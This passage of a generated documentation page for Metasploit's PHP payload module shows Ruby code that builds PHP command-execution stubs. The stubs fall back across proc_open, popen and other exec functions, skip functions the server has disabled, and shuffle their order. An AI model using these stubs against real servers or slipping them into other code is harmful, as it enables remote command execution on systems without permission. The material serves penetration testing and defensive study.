</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_output'>output</span><span class='embexpr_end'>}</span><span class='tstring_content'>=join(chr(10),</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_output'>output</span><span class='embexpr_end'>}</span><span class='tstring_content'>).chr(10);
|
||
</span><span class='tstring_content'> }else
|
||
</span><span class='heredoc_end'> TEXT
|
||
</span> <span class='id identifier rubyid_proc_open'>proc_open</span> <span class='op'>=</span> <span class='heredoc_beg'><<~TEXT</span>
|
||
<span class='tstring_content'> if(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_is_callable'>is_callable</span><span class='embexpr_end'>}</span><span class='tstring_content'>('proc_open')&&!</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_in_array'>in_array</span><span class='embexpr_end'>}</span><span class='tstring_content'>('proc_open',</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dis'>dis</span><span class='embexpr_end'>}</span><span class='tstring_content'>)){
|
||
</span><span class='tstring_content'> $handle=proc_open(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_content'>,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_output'>output</span><span class='embexpr_end'>}</span><span class='tstring_content'>=NULL;
|
||
</span><span class='tstring_content'> while(!feof($pipes[1])){
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_output'>output</span><span class='embexpr_end'>}</span><span class='tstring_content'>.=fread($pipes[1],1024);
|
||
</span><span class='tstring_content'> }
|
||
</span><span class='tstring_content'> @proc_close($handle);
|
||
</span><span class='tstring_content'> }else
|
||
</span><span class='heredoc_end'> TEXT
|
||
</span> <span class='id identifier rubyid_popen'>popen</span> <span class='op'>=</span> <span class='heredoc_beg'><<~TEXT</span>
|
||
<span class='tstring_content'> if(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_is_callable'>is_callable</span><span class='embexpr_end'>}</span><span class='tstring_content'>('popen')&&!</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_in_array'>in_array</span><span class='embexpr_end'>}</span><span class='tstring_content'>('popen',</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dis'>dis</span><span class='embexpr_end'>}</span><span class='tstring_content'>)){
|
||
</span><span class='tstring_content'> $fp=popen(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_content'>,'r');
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_output'>output</span><span class='embexpr_end'>}</span><span class='tstring_content'>=NULL;
|
||
</span><span class='tstring_content'> if(is_resource($fp)){
|
||
</span><span class='tstring_content'> while(!feof($fp)){
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_output'>output</span><span class='embexpr_end'>}</span><span class='tstring_content'>.=fread($fp,1024);
|
||
</span><span class='tstring_content'> }
|
||
</span><span class='tstring_content'> }
|
||
</span><span class='tstring_content'> @pclose($fp);
|
||
</span><span class='tstring_content'> }else
|
||
</span><span class='heredoc_end'> TEXT
|
||
</span> <span class='comment'># Currently unused until we can figure out how to get output with COM
|
||
</span> <span class='comment'># objects (which are not subject to safe mode restrictions) instead of
|
||
</span> <span class='comment'># PHP functions.
|
||
</span> <span class='comment'>#win32_com = "
|
||
</span> <span class='comment'># if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
|
||
</span> <span class='comment'># $wscript = new COM('Wscript.Shell');
|
||
</span> <span class='comment'># $wscript->run(#{cmd} . ' > %TEMP%\\out.txt');
|
||
</span> <span class='comment'># #{output} = file_get_contents('%TEMP%\\out.txt');
|
||
</span> <span class='comment'># }else"
|
||
</span> <span class='id identifier rubyid_fail_block'>fail_block</span> <span class='op'>=</span> <span class='heredoc_beg'><<~TEXT</span>
|
||
<span class='tstring_content'> {
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_output'>output</span><span class='embexpr_end'>}</span><span class='tstring_content'>=0;
|
||
</span><span class='tstring_content'> }
|
||
</span><span class='heredoc_end'> TEXT
|
||
</span>
|
||
<span class='id identifier rubyid_exec_methods'>exec_methods</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='id identifier rubyid_passthru'>passthru</span><span class='comma'>,</span> <span class='id identifier rubyid_shell_exec'>shell_exec</span><span class='comma'>,</span> <span class='id identifier rubyid_system'>system</span><span class='comma'>,</span> <span class='id identifier rubyid_exec'>exec</span><span class='comma'>,</span> <span class='id identifier rubyid_proc_open'>proc_open</span><span class='comma'>,</span> <span class='id identifier rubyid_popen'>popen</span><span class='rbracket'>]</span>
|
||
<span class='id identifier rubyid_exec_methods'>exec_methods</span> <span class='op'>=</span> <span class='id identifier rubyid_exec_methods'>exec_methods</span><span class='period'>.</span><span class='id identifier rubyid_shuffle'>shuffle</span>
|
||
<span class='id identifier rubyid_setup'>setup</span> <span class='op'>+</span> <span class='id identifier rubyid_exec_methods'>exec_methods</span><span class='period'>.</span><span class='id identifier rubyid_join'>join</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span> <span class='op'>+</span> <span class='id identifier rubyid_fail_block'>fail_block</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
</div>
|
||
|
||
<div id="instance_method_details" class="method_details_list">
|
||
<h2>Instance Method Details</h2>
|
||
|
||
|
||
<div class="method_details first">
|
||
<h3 class="signature first" id="php_create_exec_stub-instance_method">
|
||
|
||
#<strong>php_create_exec_stub</strong>(php_code) ⇒ <tt>Object</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
175
|
||
176
|
||
177</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/payload/php.rb', line 175</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_php_create_exec_stub'>php_create_exec_stub</span><span class='lparen'>(</span><span class='id identifier rubyid_php_code'>php_code</span><span class='rparen'>)</span>
|
||
<span class='const'><span class='object_link'><a href="../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Payload.html" title="Msf::Payload (class)">Payload</a></span></span><span class='op'>::</span><span class='const'>PHP</span><span class='period'>.</span><span class='id identifier rubyid_create_exec_stub'>create_exec_stub</span><span class='lparen'>(</span><span class='id identifier rubyid_php_code'>php_code</span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="php_exec_cmd-instance_method">
|
||
|
||
#<strong>php_exec_cmd</strong>(cmd) ⇒ <tt>Object</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
160
|
||
161
|
||
162
|
||
163
|
||
164
|
||
165
|
||
166</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/payload/php.rb', line 160</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_php_exec_cmd'>php_exec_cmd</span><span class='lparen'>(</span><span class='id identifier rubyid_cmd'>cmd</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_vars'>vars</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>RandomIdentifier</span><span class='op'>::</span><span class='const'>Generator</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='label'>language:</span> <span class='symbol'>:php</span><span class='rparen'>)</span>
|
||
<span class='heredoc_beg'><<-END_OF_PHP_CODE</span>
|
||
<span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_php_preamble'>php_preamble</span><span class='lparen'>(</span><span class='label'>vars_generator:</span> <span class='id identifier rubyid_vars'>vars</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>
|
||
</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_php_system_block'>php_system_block</span><span class='lparen'>(</span><span class='label'>vars_generator:</span> <span class='id identifier rubyid_vars'>vars</span><span class='comma'>,</span> <span class='label'>cmd:</span> <span class='id identifier rubyid_cmd'>cmd</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>
|
||
</span><span class='heredoc_end'> END_OF_PHP_CODE
|
||
</span><span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="php_preamble-instance_method">
|
||
|
||
#<strong>php_preamble</strong>(options = {}) ⇒ <tt>Object</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
41
|
||
42
|
||
43</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/payload/php.rb', line 41</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_php_preamble'>php_preamble</span><span class='lparen'>(</span><span class='id identifier rubyid_options'>options</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
|
||
<span class='const'><span class='object_link'><a href="../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Payload.html" title="Msf::Payload (class)">Payload</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="" title="Msf::Payload::Php (module)">Php</a></span></span><span class='period'>.</span><span class='id identifier rubyid_preamble'><span class='object_link'><a href="#preamble-class_method" title="Msf::Payload::Php.preamble (method)">preamble</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_options'>options</span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="php_system_block-instance_method">
|
||
|
||
#<strong>php_system_block</strong>(options = {}) ⇒ <tt>Object</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
156
|
||
157
|
||
158</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/payload/php.rb', line 156</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_php_system_block'>php_system_block</span><span class='lparen'>(</span><span class='id identifier rubyid_options'>options</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
|
||
<span class='const'><span class='object_link'><a href="../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Payload.html" title="Msf::Payload (class)">Payload</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="" title="Msf::Payload::Php (module)">Php</a></span></span><span class='period'>.</span><span class='id identifier rubyid_system_block'><span class='object_link'><a href="#system_block-class_method" title="Msf::Payload::Php.system_block (method)">system_block</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_options'>options</span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
</div>
|
||
|
||
</div>
|
||
|
||
<div id="footer">
|
||
Generated on Fri May 8 17:01:04 2026 by
|
||
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
|
||
0.9.37 (ruby-3.1.5).
|
||
</div>
|
||
|
||
</div>
|
||
</body>
|
||
</html> |